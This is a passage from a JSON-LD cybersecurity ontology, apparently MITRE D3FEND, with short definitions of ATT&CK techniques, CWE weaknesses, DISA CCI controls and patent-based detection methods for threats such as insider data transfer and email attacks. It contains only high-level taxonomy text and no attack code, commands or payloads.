      "d3f:definition": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.",
      "d3f:uses": {
        "@id": "d3f:CloudUserAccount"
      },
      "rdfs:label": "Temporary Elevated Cloud Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:Nae4ce6f851b44e499c0d8f4b4a59557c"
        },
        {
          "@id": "_:Nf473f8c61f8c40febd0cfc7a907c3078"
        }
      ]
    },
    {
      "@id": "_:Nae4ce6f851b44e499c0d8f4b4a59557c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:abuses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "_:Nf473f8c61f8c40febd0cfc7a907c3078",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudUserAccount"
      }
    },
    {
      "@id": "d3f:risk-impact",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Risk impact rating, expressed on a numeric scale from 1 (lowest impact) to 5 (highest impact) in the context of a 5x5 risk matrix. Impact is used here as a synonym for consequence, another popular term used in risk analysis.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.cto.mil/wp-content/uploads/2024/05/RIO-2023-2-2.pdf"
      },
      "rdfs:label": "risk-impact",
      "rdfs:range": {
        "@id": "_:N3229f2722e8c4842b370a134d38185ca"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "_:N3229f2722e8c4842b370a134d38185ca",
      "@type": "rdfs:Datatype",
      "owl:onDatatype": {
        "@id": "xsd:integer"
      },
      "owl:withRestrictions": {
        "@list": [
          {
            "@id": "_:Nf11ce9605f314c61b773adf651c3125a"
          },
          {
            "@id": "_:N99cd1dff73e14e7fa1d6f150d0f86db2"
          }
        ]
      }
    },
    {
      "@id": "_:Nf11ce9605f314c61b773adf651c3125a",
      "xsd:minInclusive": 1
    },
    {
      "@id": "_:N99cd1dff73e14e7fa1d6f150d0f86db2",
      "xsd:maxInclusive": 5
    },
    {
      "@id": "d3f:DS0041",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:broader": {
        "@id": "d3f:CodeAnalyzer"
      },
      "d3f:definition": "Application vetting report generated by an external cloud service.",
      "rdfs:label": "Application Vetting (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-114",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-114",
      "d3f:definition": "Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.",
      "rdfs:label": "Process Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-73"
      }
    },
    {
      "@id": "d3f:CCI-002426_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a trusted communications path that is logically isolated and distinguishable from other paths.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002426"
    },
    {
      "@id": "d3f:Reference-SystemForDetectingThreatsUsingScenario-basedTrackingOfInternalAndExternalNetworkTraffic_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160191563A1"
      },
      "d3f:kb-abstract": "Disclosed is an improved approach to implement a system and method for detecting insider threats, where models are constructed that is capable of defining what constitutes the normal behavior for any given hosts and quickly find anomalous behaviors that could constitute a potential threat to an organization. The disclosed approach provides a way to identify abnormal data transfers within and external to an organization without the need for individual monitoring software on each host, by leveraging metadata that describe the data exchange patterns observed in the network.",
      "d3f:kb-author": "Nicolas BEAUCHESNE; David Lopes Pegna",
      "d3f:kb-mitre-analysis": "Determination of anomalous data transfers is performed over a given time period. For example, a check of a pull vs. push data ratio can be established over a specific time period, e.g., over a three-hour period, over a one day period, over a one week period, etc.\n\nThe system can also establish a baseline behavior for data exchange for each host in terms of pull vs. push data ratio for each resource contacted by the host.\n\nNetwork packet capture data is collected and metadata is extracted. Aggregate data push/pull information from the metadata is then analyzed for a given host versus specific client to server relationships. This technique can potentially catch lateral data transfers, and may have filtering on alerting logic to only raise alarms when external hosts receive large data transfers.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:PerHostDownload-UploadRatioAnalysis"
      },
      "d3f:kb-reference-title": "System for detecting threats using scenario-based tracking of internal and external network traffic",
      "rdfs:label": "Reference - System for detecting threats using scenario-based tracking of internal and external network traffic - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:Reference-CredentialDumpingViaMimikatz_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-04-004/"
      },
      "d3f:kb-abstract": "Credential dumpers like Mimikatz can be loaded into memory and from there read data from another processes. This analytic looks for instances where processes are requesting specific permissions to read parts of the LSASS process in order to detect when credential dumping is occurring. One weakness is that all current implementations are \"overtuned\" to look for common access patterns used by Mimikatz.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-04-004: Credential Dumping via Mimikatz",
      "rdfs:label": "Reference - CAR-2019-04-004: Credential Dumping via Mimikatz - MITRE"
    },
    {
      "@id": "d3f:Mode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MOD",
      "d3f:definition": "The most frequent value in the data set. This is the only central tendency measure that can be used with nominal data, which have purely qualitative category assignments.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Mode",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:CWE-474",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-474",
      "d3f:definition": "The code uses a function that has inconsistent implementations across operating systems and versions.",
      "rdfs:label": "Use of Function with Inconsistent Implementations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-758"
      }
    },
    {
      "@id": "d3f:T1074.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1074.002",
      "d3f:definition": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.",
      "d3f:modifies": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:label": "Remote Data Staging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1074"
        },
        {
          "@id": "_:N92e8686b57164fac9adefe098fbbe8f5"
        }
      ]
    },
    {
      "@id": "_:N92e8686b57164fac9adefe098fbbe8f5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:CWE-640",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-640",
      "d3f:definition": "The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.",
      "rdfs:label": "Weak Password Recovery Mechanism for Forgotten Password",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:Reference-VirtualizedProcessIsolation_AdvancedMicroDevicesInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180081829A1"
      },
      "d3f:kb-abstract": "Systems, apparatuses, and methods for implementing virtualized process isolation are disclosed. A system includes a kernel and multiple guest VMs executing on the system's processing hardware. Each guest VM includes a vShim layer for managing kernel accesses to user space and guest accesses to kernel space. The vShim layer also maintains a separate set of page tables from the kernel page tables. In one embodiment, data in the user space is encrypted and the kernel goes through the vShim layer to access user space data. When the kernel attempts to access a user space address, the kernel exits and the vShim layer is launched to process the request. If the kernel has permission to access the address, the vShim layer copies the data to a region in kernel space and then returns execution to the kernel.",
      "d3f:kb-author": "David A. Kaplan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Advanced Micro Devices Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Virtualized process isolation",
      "rdfs:label": "Reference - Virtualized process isolation - Advanced Micro Devices Inc"
    },
    {
      "@id": "d3f:ScheduledJobCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the addition of a new task to the system's scheduler, defining its execution criteria and associated actions.",
      "rdfs:label": "Scheduled Job Creation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:ScheduledJobEvent"
      }
    },
    {
      "@id": "d3f:process-user",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x process-user y: The process x has been executed by the user y.",
      "rdfs:label": "process-user",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-property"
      },
      "skos:altLabel": "processUser"
    },
    {
      "@id": "d3f:CWE-598",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-598",
      "d3f:definition": "The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request.",
      "rdfs:label": "Use of GET Request Method With Sensitive Query Strings",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-201"
      }
    },
    {
      "@id": "d3f:CCI-001453_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the integrity of remote access sessions.",
      "d3f:exactly": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001453"
    },
    {
      "@id": "d3f:T1553.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1553.005",
      "d3f:definition": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)",
      "rdfs:label": "Mark-of-the-Web Bypass",
      "rdfs:subClassOf": {
        "@id": "d3f:T1553"
      }
    },
    {
      "@id": "d3f:ServiceDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the uninstallation or deregistration of a service application, ensuring it is no longer operational or available to clients.",
      "rdfs:label": "Service Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationDeletionEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nd6d25b438e7d401586d9b408f9b87771"
        }
      ]
    },
    {
      "@id": "_:Nd6d25b438e7d401586d9b408f9b87771",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceInstallationEvent"
      }
    },
    {
      "@id": "d3f:IPReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IPReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:IPAddress"
      },
      "d3f:d3fend-id": "D3-IPRA",
      "d3f:definition": "Analyzing the reputation of an IP address.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Database_for_receiving_storing_and_compiling_information_about_email_messages"
        },
        {
          "@id": "d3f:Reference-Finding_phishing_sites"
        }
      ],
      "rdfs:label": "IP Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierReputationAnalysis"
        },
        {
          "@id": "_:N75a3c68951bd45fdb5eb27ee34cdc5fb"
        }
      ]
    },
    {
      "@id": "_:N75a3c68951bd45fdb5eb27ee34cdc5fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IPAddress"
      }
    },
    {
      "@id": "d3f:M1042",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ApplicationConfigurationHardening"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        },
        {
          "@id": "d3f:SystemCallFiltering"
        }
      ],
      "rdfs:label": "Disable or Remove Feature or Program"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodThereofForIdentifyingAndRespondingToSecurityIncidentsBasedOnPreemptiveForensics_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160142424A1"
      },
      "d3f:kb-abstract": "A system is connected to a plurality of user devices coupled to an enterprise's network. The system continuously collects, stores, and analyzes forensic data related to the enterprise's network. Based on the analysis, the system is able to determine normal behavior of the network and portions thereof and thereby identify abnormal behaviors within the network. Upon identification of an abnormal behavior, the system determines whether the abnormal behavior relates to a security incident. Upon determining a security incident in any portion of the enterprise's network, the system extracts forensic data respective of the security incident and enables further assessment of the security incident as well as identification of the source of the security incident. The system provides real-time damage assessment respective of the security incident as well as the security incident's attributions.",
      "d3f:kb-author": "Gil BARAK; Shai MORAG",
      "d3f:kb-mitre-analysis": "This patent describes detecting abnormal behavior related to a security incident by collecting and analyzing forensic data in real time. Forensic data may include:\n\n* URLs visited\n* data downloaded or streamed\n* messages received and sent\n* amount of memory used for processing\n\nThe data is then analyzed according to a set of dynamically created rules to determine normal behavior patterns associated with the network or user devices. Anomalies between current behavior and normal behavior patterns trigger an alert.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:UserDataTransferAnalysis"
        },
        {
          "@id": "d3f:WebSessionActivityAnalysis"
        }
      ],
      "d3f:kb-reference-title": "System and method thereof for identifying and responding to security incidents based on preemptive forensics",
      "rdfs:label": "Reference - System and method thereof for identifying and responding to security incidents based on preemptive forensics - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:CCI-001954_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system electronically verifies Personal Identity Verification (PIV) credentials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001954"
    },
    {
      "@id": "d3f:CCI-000040_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization audits any use of privileged accounts, or roles, with access to organization-defined security functions or security-relevant information, when accessing other system functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000040"
    },
    {
      "@id": "d3f:AccessControlList",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A list of permissions attached to an object.",
      "d3f:restricts": {
        "@id": "d3f:UserGroup"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Access-control_list"
      },
      "rdfs:label": "Access Control List",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlConfiguration"
        },
        {
          "@id": "_:N9ff5fe5d64bf4695aa24385ea23b12eb"
        }
      ]
    },
    {
      "@id": "_:N9ff5fe5d64bf4695aa24385ea23b12eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserGroup"
      }
    },
    {
      "@id": "d3f:ASCIIDomainName",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DomainName"
      ],
      "rdfs:label": "ASCII Domain Name"
    },
    {
      "@id": "d3f:T1606",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1606",
      "d3f:definition": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.",
      "d3f:forges": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Forge Web Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N7bde530740944e7e8a5e849eb8f99a1e"
        }
      ]
    },
    {
      "@id": "_:N7bde530740944e7e8a5e849eb8f99a1e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:T1108",
      "@type": "owl:Class",
      "d3f:attack-id": "T1108",
      "d3f:definition": "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**",
      "rdfs:label": "Redundant Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1118",
      "@type": "owl:Class",
      "d3f:attack-id": "T1118",
      "d3f:definition": "InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: <code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and <code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>. InstallUtil.exe is digitally signed by Microsoft.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.004",
      "rdfs:label": "InstallUtil",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1590",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590",
      "d3f:definition": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.",
      "rdfs:label": "Gather Victim Network Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:IMP-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0003",
      "d3f:definition": "Measures designed to temporarily eliminate the use, access, or operation of a system for a period of time, usually without physical damage to the affected system. Threat actors may seek to deny ground controllers and other interested parties access to the victim spacecraft. This would be done exhausting system resource, degrading subsystems, or blocking communications entirely. This behavior is different from Disruption as this seeks to deny communications entirely, rather than stop them for a length of time.",
      "rdfs:label": "Denial - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Denial"
    },
    {
      "@id": "d3f:Receiver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A receiver is a device or system that acquires signals and converts them into usable information. It senses a physical carrier (such as electromagnetic fields, light, electrical currents, or acoustic waves), conditions the input, and extracts the intended content through operations like filtering, amplification, detection, synchronization, demodulation, decoding, and error correction. A receiver may be analog or digital, implemented in hardware, software, or both, and is designed to mitigate impairments such as noise, interference, and distortion while delivering recovered data or media to downstream processes.",
      "d3f:receives": {
        "@id": "d3f:Signal"
      },
      "rdfs:label": "Receiver",
      "rdfs:seeAlso": {
        "@id": "https://www.analog.com/en/resources/glossary/receiver.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:Nffd06f51e4994799b7485daa9f22388a"
        }
      ]
    },
    {
      "@id": "_:Nffd06f51e4994799b7485daa9f22388a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:receives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:associated-with",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x associated-with y: The subject x and object y are associated in some way.  This is the most general definite relationship in d3fend (i.e., most general relationship that is not prefixed by 'may-'.)",
      "rdfs:label": "associated-with",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13804981-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1048.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1048.002",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "rdfs:label": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1048"
        },
        {
          "@id": "_:N0bfe2e6756cb438398d84da7f52054ee"
        },
        {
          "@id": "_:Nacebdb4c51b1426d911be1befdcac23e"
        }
      ]
    },
    {
      "@id": "_:N0bfe2e6756cb438398d84da7f52054ee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:Nacebdb4c51b1426d911be1befdcac23e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patentimages.storage.googleapis.com/a9/40/78/713c8deb2c4c7a/US20190268352A1.pdf"
      },
      "d3f:kb-abstract": "A Content Disarm and Reconstruction ( CDR ) method is disclosed including a computer receiving an input file hav ing a file format configured with a structured storage. The computer disassembles the structured storage into at least one subfile . Each subfile is a stream subfile . For each subfile , the computer identifies an item in the stream subfile . The computer analyzes the item in the stream subfile for an unwanted behavior by determining an acceptability of the unwanted behavior , distinguishing a visibility of the item , and recognizing a necessity of the item . The computer , based on a result of the analyzing step , processes the item in the stream subfile resulting in a processed subfile . The computer assembles the processed subfiles into an output file having the same file format as the file format as the input file .",
      "d3f:kb-author": "Taeil Goh, Vinh Nguyen Xuan Lam, Nhut Minh Ngo, Dung Huu Nguyen",
      "d3f:kb-organization": "OPSWAT, Inc.",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ContentExcision"
        },
        {
          "@id": "d3f:ContentFiltering"
        },
        {
          "@id": "d3f:ContentFormatConversion"
        },
        {
          "@id": "d3f:ContentModification"
        },
        {
          "@id": "d3f:ContentRebuild"
        },
        {
          "@id": "d3f:ContentSubstitution"
        }
      ],
      "d3f:kb-reference-title": "Method For Content Disarm and Reconstruction",
      "rdfs:label": "Reference - Method For Content Disarm and Reconstruction - OPSWAT Inc"
    },
    {
      "@id": "d3f:Reference-SystemsAndMethodsForDetectingAnd_orHandlingTargetedAttacksInTheEmailChannel_GraphusInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170324767A1"
      },
      "d3f:kb-abstract": "Techniques for detecting and/or handling target attacks in an enterprise's email channel are provided. The techniques include receiving aspects of an incoming email message addressed to a first email account holder, selecting a recipient interaction profile and/or a sender profile from a plurality of predetermined profiles stored in a memory based upon the received properties, determining a message trust rating associated with the incoming email message based upon the incoming email message and the selected recipient interaction profile and/or the sender profile; and generating an alert identifying the incoming email message as including a security risk based upon the determined message trust rating. The recipient interaction profile includes information associating the first email account holder and a plurality of email senders from whom email messages have previously been received for the first email account holder, and the sender profile includes information associating a sender of the incoming email message with characteristics determined from a plurality of email messages previously received from the sender.",
      "d3f:kb-author": "Manoj Kumar Srivastava",
      "d3f:kb-mitre-analysis": "The patent describes using sender trust rating and sender MTA trust rating as an indicator of level of email security risk.\n\n### Sender Reputation explanation\nThis patent includes Sender Reputation because it describes sender trust rating being used as an indicator of the level of security risk and/or trust level associated with an email sender. The sender trust rating may be determined based on one or more of:\n\n* length of time sender has known the enterprise\n* number of recipients in the enterprise the sender interacts with\n* sender vs. enterprise originated message ratio\n* sender messages open vs. not-open ratio\n* number of emails received from this sender\n* number of emails replied for this sender\n* number of emails from this sender not opened\n* number of emails from this sender not opened that contain an attachment\n* number of emails from this sender not opened that contain a URL\n* number of emails sent to this sender\n* number of email replies received from this sender\n\nBased on the trust rating an alert is generated identifying the incoming email message as a security risk.\n\n### Sender MTA Reputation explanation\nThis patent includes Sender MTA Reputation because it describes sender MTA trust rating as an indicator of the level of security risk and/or trust level associated with a sender MTA. The trust rating may be determined based on one or more of:\n\n* length of time MTA has interacted with the enterprise\n* number of sender domains sending emails from the MTA\n* number of recipients in the enterprise the MTA sends emails to\n* number of emails received from this MTA\n* number of email replies received from this MTA\n\nBased on the trust rating an alert is generated identifying the incoming email message as a security risk.",
      "d3f:kb-organization": "Graphus Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:SenderMTAReputationAnalysis"
        },
        {
          "@id": "d3f:SenderReputationAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Systems and methods for detecting and/or handling targeted attacks in the email channel",
      "rdfs:label": "Reference - Systems and methods for detecting and/or handling targeted attacks in the email channel - Graphus Inc"
    },
    {
      "@id": "d3f:ConfigurationFile",
      "@type": "owl:Class",
      "d3f:definition": "A file containing Information used to configure the parameters and initial settings for some computer programs. They are used for user applications, server processes and operating system settings.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Configuration_file"
      },
      "rdfs:label": "Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      },
      "skos:altLabel": "Settings File"
    },
    {
      "@id": "d3f:CWE-471",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-471",
      "d3f:definition": "The product does not properly protect an assumed-immutable element from being modified by an attacker.",
      "rdfs:label": "Modification of Assumed-Immutable Data (MAID)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:T1618",
      "@type": "owl:Class",
      "d3f:attack-id": "T1618",
      "d3f:definition": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1628.002",
      "rdfs:label": "User Evasion - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1628.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "User Evasion"
    },
    {
      "@id": "d3f:CWE-1190",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1190",
      "d3f:definition": "The product enables a Direct Memory Access (DMA) capable device before the security configuration settings are established, which allows an attacker to extract data from or gain privileges on the product.",
